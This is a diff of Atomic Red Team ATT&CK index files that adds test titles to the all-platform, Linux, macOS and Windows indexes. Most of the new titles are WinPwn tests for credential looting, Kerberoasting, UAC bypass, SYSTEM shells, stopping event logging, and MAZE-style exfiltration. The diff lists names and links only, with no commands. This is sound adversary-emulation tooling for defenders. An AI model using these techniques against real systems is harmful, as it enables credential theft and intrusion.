   - Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
+  - Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -45,6 +55,12 @@
   - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
   - Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
   - Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
+  - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
+  - Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
+  - Atomic Test #11: WinPwn - BrowserPwn [windows]
+  - Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
+  - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
+  - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -55,6 +71,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
   - Atomic Test #1: PetitPotam [windows]
+  - Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #1: AppleScript - Prompt User for Password [macos]
@@ -72,6 +89,8 @@
   - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
   - Atomic Test #4: Request A Single Ticket via PowerShell [windows]
   - Atomic Test #5: Request All Tickets via PowerShell [windows]
+  - Atomic Test #6: WinPwn - Kerberoasting [windows]
+  - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
 - [T1555.001 Keychain](../../T1555.001/T1555.001.md)
   - Atomic Test #1: Keychain [macos]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
@@ -114,6 +133,8 @@
   - Atomic Test #2: Packet Capture macOS [macos]
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
+  - Atomic Test #5: Windows Internal pktmon capture [windows]
+  - Atomic Test #6: Windows Internal pktmon set filter [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -134,6 +155,7 @@
   - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
+  - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
 - [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
   - Atomic Test #1: Malicious PAM rule [linux]
   - Atomic Test #2: Malicious PAM module [linux]
@@ -158,6 +180,7 @@
   - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
   - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
   - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
   - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
@@ -172,6 +195,7 @@
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.004 Windows Credential Manager](../../T1555.004/T1555.004.md)
   - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
+  - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
 
 # collection
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -300,6 +324,10 @@
   - Atomic Test #15: UACME Bypass Method 56 [windows]
   - Atomic Test #16: UACME Bypass Method 59 [windows]
   - Atomic Test #17: UACME Bypass Method 61 [windows]
+  - Atomic Test #18: WinPwn - UAC Magic [windows]
+  - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
+  - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
+  - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -316,6 +344,7 @@
   - Atomic Test #2: CreateCronjob [containers]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
   - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
@@ -338,6 +367,7 @@
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
   - Atomic Test #1: Persistance with Event Monitor - emond [macos]
@@ -365,6 +395,8 @@
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
   - Atomic Test #1: Logon Scripts - Mac [macos]
@@ -519,6 +551,10 @@
   - Atomic Test #15: UACME Bypass Method 56 [windows]
   - Atomic Test #16: UACME Bypass Method 59 [windows]
   - Atomic Test #17: UACME Bypass Method 61 [windows]
+  - Atomic Test #18: WinPwn - UAC Magic [windows]
+  - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
+  - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
+  - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
   - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
   - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -570,6 +606,7 @@
 - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
   - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
@@ -648,6 +685,7 @@
   - Atomic Test #27: Disable Defender with Defender Control [windows]
   - Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
   - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
+  - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -662,6 +700,7 @@
   - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
 - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
   - Atomic Test #1: Process Injection via mavinject.exe [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -753,6 +792,8 @@
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
@@ -898,7 +939,8 @@
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1620 Reflective Code Loading](../../T1620/T1620.md)
+  - Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
 - [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
   - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
   - Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
@@ -969,6 +1011,8 @@
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
   - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
+  - Atomic Test #11: Lolbin Gpscript logon option [windows]
+  - Atomic Test #12: Lolbin Gpscript startup option [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -1011,7 +1055,9 @@
   - Atomic Test #1: Named pipe client impersonation [windows]
   - Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
+  - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
+  - Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1158,6 +1204,8 @@
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
   - Atomic Test #1: Logon Scripts - Mac [macos]
@@ -1372,6 +1420,7 @@
   - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
   - Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
   - Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
+  - Atomic Test #15: WinPwn - generaldomaininfo [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1404,6 +1453,8 @@
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
   - Atomic Test #1: Display group policy information via gpresult [windows]
   - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
+  - Atomic Test #3: WinPwn - GPOAudit [windows]
+  - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #1: Enumerate all accounts (Local) [linux]
@@ -1428,6 +1479,10 @@
   - Atomic Test #2: Port Scan Nmap [linux, macos]
   - Atomic Test #3: Port Scan NMap for Windows [windows]
   - Atomic Test #4: Port Scan using python [windows]
+  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
+  - Atomic Test #6: WinPwn - MS17-10 [windows]
+  - Atomic Test #7: WinPwn - bluekeep [windows]
+  - Atomic Test #8: WinPwn - fruit [windows]
 - [T1135 Network Share Discovery](../../T1135/T1135.md)
   - Atomic Test #1: Network Share Discovery [macos]
   - Atomic Test #2: Network Share Discovery - linux [linux]
@@ -1436,11 +1491,14 @@
   - Atomic Test #5: View available share drives [windows]
   - Atomic Test #6: Share Discovery with PowerView [windows]
   - Atomic Test #7: PowerView ShareFinder [windows]
+  - Atomic Test #8: WinPwn - shareenumeration [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux [linux]
   - Atomic Test #2: Packet Capture macOS [macos]
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
+  - Atomic Test #5: Windows Internal pktmon capture [windows]
+  - Atomic Test #6: Windows Internal pktmon set filter [windows]
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
   - Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
@@ -1453,6 +1511,7 @@
   - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
+  - Atomic Test #2: WinPwn - printercheck [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #1: Process Discovery - ps [macos, linux]
@@ -1493,6 +1552,9 @@
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
   - Atomic Test #3: Find and Display Safari Browser Version [macos]
+  - Atomic Test #4: WinPwn - Dotnetsearch [windows]
+  - Atomic Test #5: WinPwn - DotNet [windows]
+  - Atomic Test #6: WinPwn - powerSQL [windows]
 - [T1497.001 System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
@@ -1511,6 +1573,16 @@
   - Atomic Test #10: Environment variables discovery on windows [windows]
   - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
   - Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
+  - Atomic Test #13: WinPwn - winPEAS [windows]
+  - Atomic Test #14: WinPwn - itm4nprivesc [windows]
+  - Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
+  - Atomic Test #16: WinPwn - General privesc checks [windows]
+  - Atomic Test #17: WinPwn - GeneralRecon [windows]
+  - Atomic Test #18: WinPwn - Morerecon [windows]
+  - Atomic Test #19: WinPwn - RBCD-Check [windows]
+  - Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
+  - Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
+  - Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
 - [T1614.001 System Language Discovery](../../T1614.001/T1614.001.md)
   - Atomic Test #1: Discover System Language by Registry Query [windows]
   - Atomic Test #2: Discover System Language with chcp [windows]
@@ -1672,10 +1744,14 @@
   - Atomic Test #7: Headless Chrome code execution via VBA [windows]
   - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
   - Atomic Test #9: Office Generic Payload Download [windows]
+  - Atomic Test #10: LNK Payload Download [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
   - Atomic Test #1: Execution through API - CreateProcess [windows]
+  - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
+  - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
+  - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
 - T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
   - Atomic Test #1: Mimikatz [windows]
@@ -1843,6 +1919,8 @@
   - Atomic Test #18: Curl Download File [windows]
   - Atomic Test #19: Curl Upload File [windows]
   - Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+  - Atomic Test #21: MAZE Propagation Script [windows]
+  - Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
   - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -1916,6 +1994,7 @@
   - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
   - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
   - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
+  - Atomic Test #6: MAZE FTP Upload [windows]
 - [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
   - Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1943,6 +2022,8 @@
 - [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1091 Replication Through Removable Media](../../T1091/T1091.md)
   - Atomic Test #1: USB Malware Spread Simulation [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -20,7 +20,8 @@
   - Atomic Test #2: Extract passwords with grep [macos, linux]
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
+  - Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1056.002 GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -14,6 +14,7 @@
 - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #2: Search macOS Safari Cookies [macos]
+  - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -4,6 +4,7 @@
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
   - Atomic Test #2: Get-DomainUser with PowerView [windows]
+  - Atomic Test #3: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.005 Cached Domain Credentials](../../T1003.005/T1003.005.md)
@@ -14,12 +15,21 @@
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #3: Extracting passwords with findstr [windows]
   - Atomic Test #4: Access unattend.xml [windows]
+  - Atomic Test #6: WinPwn - sensitivefiles [windows]
+  - Atomic Test #7: WinPwn - Snaffler [windows]
+  - Atomic Test #8: WinPwn - powershellsensitive [windows]
+  - Atomic Test #9: WinPwn - passhunt [windows]
+  - Atomic Test #10: WinPwn - SessionGopher [windows]
+  - Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
   - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
   - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
   - Atomic Test #4: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] [windows]
   - Atomic Test #5: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - lazagne [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Wifi Credentials [windows]
+  - Atomic Test #8: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -28,6 +38,10 @@
   - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
   - Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
   - Atomic Test #8: Decrypt Mozilla Passwords with Firepwd.py [windows]
+  - Atomic Test #10: Stage Popular Credential Files for Exfiltration [windows]
+  - Atomic Test #11: WinPwn - BrowserPwn [windows]
+  - Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
+  - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -38,6 +52,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
   - Atomic Test #1: PetitPotam [windows]
+  - Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
 - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
   - Atomic Test #2: PowerShell - Prompt User for Password [windows]
@@ -54,6 +69,8 @@
   - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
   - Atomic Test #4: Request A Single Ticket via PowerShell [windows]
   - Atomic Test #5: Request All Tickets via PowerShell [windows]
+  - Atomic Test #6: WinPwn - Kerberoasting [windows]
+  - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
 - [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
   - Atomic Test #1: Input Capture [windows]
 - [T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
@@ -86,6 +103,8 @@
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
+  - Atomic Test #5: Windows Internal pktmon capture [windows]
+  - Atomic Test #6: Windows Internal pktmon set filter [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -102,6 +121,7 @@
   - Atomic Test #1: Password Spray all Domain Users [windows]
   - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
   - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
   - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
@@ -114,6 +134,7 @@
   - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
   - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
   - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
   - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
@@ -126,6 +147,7 @@
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.004 Windows Credential Manager](../../T1555.004/T1555.004.md)
   - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
+  - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
 
 # collection
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -226,6 +248,10 @@
   - Atomic Test #15: UACME Bypass Method 56 [windows]
   - Atomic Test #16: UACME Bypass Method 59 [windows]
   - Atomic Test #17: UACME Bypass Method 61 [windows]
+  - Atomic Test #18: WinPwn - UAC Magic [windows]
+  - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
+  - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
+  - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -237,6 +263,7 @@
   - Atomic Test #2: Powershell Execute COM Object [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
